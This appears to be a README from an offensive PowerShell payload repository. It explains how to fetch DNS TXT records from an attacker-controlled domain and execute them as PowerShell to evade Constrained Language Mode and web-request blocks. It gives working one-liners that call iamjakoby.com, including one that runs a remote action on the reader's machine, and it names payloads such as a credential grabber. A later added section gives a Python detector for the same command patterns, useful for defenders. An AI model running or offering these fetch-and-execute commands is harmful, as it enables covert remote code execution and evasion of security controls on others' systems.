ns-lookup.md

File metadata and controls

161 lines (108 loc) · 4.96 KB

Logo

Table of Contents
  1. Description
  2. The Commands
  3. Examples
  4. Contact
  5. Acknowledgments

NS-Lookup

YouTube Tutorial

Description

This concept was introduced to me via my friend Alh4zr3d on Twitter.

This abuses the ability to pull down DNS TXT records for a domain you control and execute the returned text as PowerShell.

This is especially helpful on systems using PowerShell Constrained Language Mode or blocking Invoke-WebRequest or Invoke-Expression.

Commands

The following commands reference the DNS TXT records shown in the image below.

(Image: the DNS TXT records referenced by the commands below)

[Single TXT Record Execution]

This nslookup example is how I was originally introduced to this concept.

It is used to pull down a single TXT record and execute it.

"example" refers to one of the DNS TXT records in the image above.

Replace it with the name of your TXT record, and replace the domain with your own.

This will execute a simple echo command to show that it works:

powershell . (nslookup -q=txt example.iamjakoby.com)[-1]

More complex payloads are of course possible.

Running the example below will automatically subscribe you to my YouTube channel (you should try it):

powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]

Take note

The previous examples will only work when executed from a PowerShell window.

If you intend to use them from the Run box, they have to be modified as follows:

powershell "powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]"

[Multiple TXT Record Execution]

The issue with pulling down a single TXT record is that TXT records have a character limit of 255.

So in order to execute longer scripts you have to pull down multiple records and combine them.

The following modified version I wrote does just that.

1..3 refers to DNS TXT records 1, 2, and 3 in the image above.

This will pull them down in that order, combine them, and then execute the result:

1..3|%{$p+=Resolve-DnsName "$_.iamjakoby.com." -Ty TXT |% S*s};& ([scriptblock]::Create($p))

Like the first example, this one needs a modification to run from the Run box:

the double quotes need to be escaped with a \ for it to function as intended.

powershell 1..3|%{$p+=Resolve-DnsName \"$_.iamjakoby.com.\" -Ty TXT -EA 0|% S*s};& ([scriptblock]::Create($p))
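From the defender's side, both command shapes above share a distinctive signature: a TXT-record lookup (nslookup -q=txt or Resolve-DnsName -Type TXT) on the same command line as something that executes the returned text (dot invocation of the nslookup output, the & call operator on a [scriptblock]::Create result, or Invoke-Expression). The following Python snippet is an added example, not code from this repo, that applies that two-part rule to a few constructed command lines of the kind PowerShell command-line or script-block logging would record. The regexes are heuristics written for this page's patterns, and the sample lines are made up to mirror them plus two benign lookalikes; neither comes from real telemetry.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Lookup half: the two TXT-record queries shown on this page.
# Case-insensitive because PowerShell and nslookup both are.
TXT_LOOKUP = re.compile(
    r"(nslookup\b[^|;]*-q(?:uery)?=txt"            # nslookup -q=txt <name>
    r"|Resolve-DnsName\b[^|;]*-Ty(?:pe)?\s+TXT)",  # Resolve-DnsName ... -Ty/-Type TXT
    re.IGNORECASE,
)

# Execution half: ways the looked-up text gets run. A lookup alone is a
# normal admin action (DMARC/SPF checks), so it never fires on its own.
EXEC_SINK = re.compile(
    r"(\[scriptblock\]::Create\s*\("   # & ([scriptblock]::Create($p))
    r"|Invoke-Expression\b|\biex\b"    # piping the text into iex
    r"|\.\s*\(\s*nslookup\b"           # dot-invoking the nslookup output
    r"|&\s*\()",                        # call operator on a scriptblock
    re.IGNORECASE,
)


@dataclass
class Finding:
    command_line: str
    lookup: str   # the matched TXT-lookup fragment
    sink: str     # the matched execution fragment


def classify(command_line: str) -> Optional[Finding]:
    """Flag a command line only when it both queries a TXT record and
    executes something; return None otherwise."""
    lookup = TXT_LOOKUP.search(command_line)
    if lookup is None:
        return None
    sink = EXEC_SINK.search(command_line)
    if sink is None:
        return None
    return Finding(command_line, lookup.group(0), sink.group(0))


def scan(command_lines: Iterable[str]) -> List[Finding]:
    """Run classify() over a batch of logged command lines."""
    return [f for f in (classify(line) for line in command_lines) if f is not None]


# Constructed sample command lines (not real telemetry). The first three
# mirror the shapes on this page; the last two are benign lookalikes that
# query TXT records without executing anything.
SAMPLE_COMMAND_LINES = [
    'powershell . (nslookup -q=txt example.iamjakoby.com)[-1]',
    'powershell "powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]"',
    'powershell 1..3|%{$p+=Resolve-DnsName \\"$_.iamjakoby.com.\\" -Ty TXT -EA 0'
    '|% S*s};& ([scriptblock]::Create($p))',
    'nslookup -q=txt _dmarc.example.com',                   # mail admin checking DMARC
    'Resolve-DnsName example.com -Type TXT | Format-List',  # plain diagnostic
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMAND_LINES):
        print(f"lookup={finding.lookup!r} sink={finding.sink!r}")
        print(f"  {finding.command_line}")
```

Requiring both halves keeps ordinary TXT diagnostics out of the alert queue; the TXT queries themselves are also visible in resolver or DNS-server logs, which is a second place to look when command-line logging is not available.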


Examples

Listed below are payloads that use one of these commands:

Acid Burn

JumpScare

WallPaper-Troll

Credz-Plz


Contact

📱 My Socials 📱

YouTube
Twitter
Instagram
Discord


Acknowledgments

HOME-PAGE
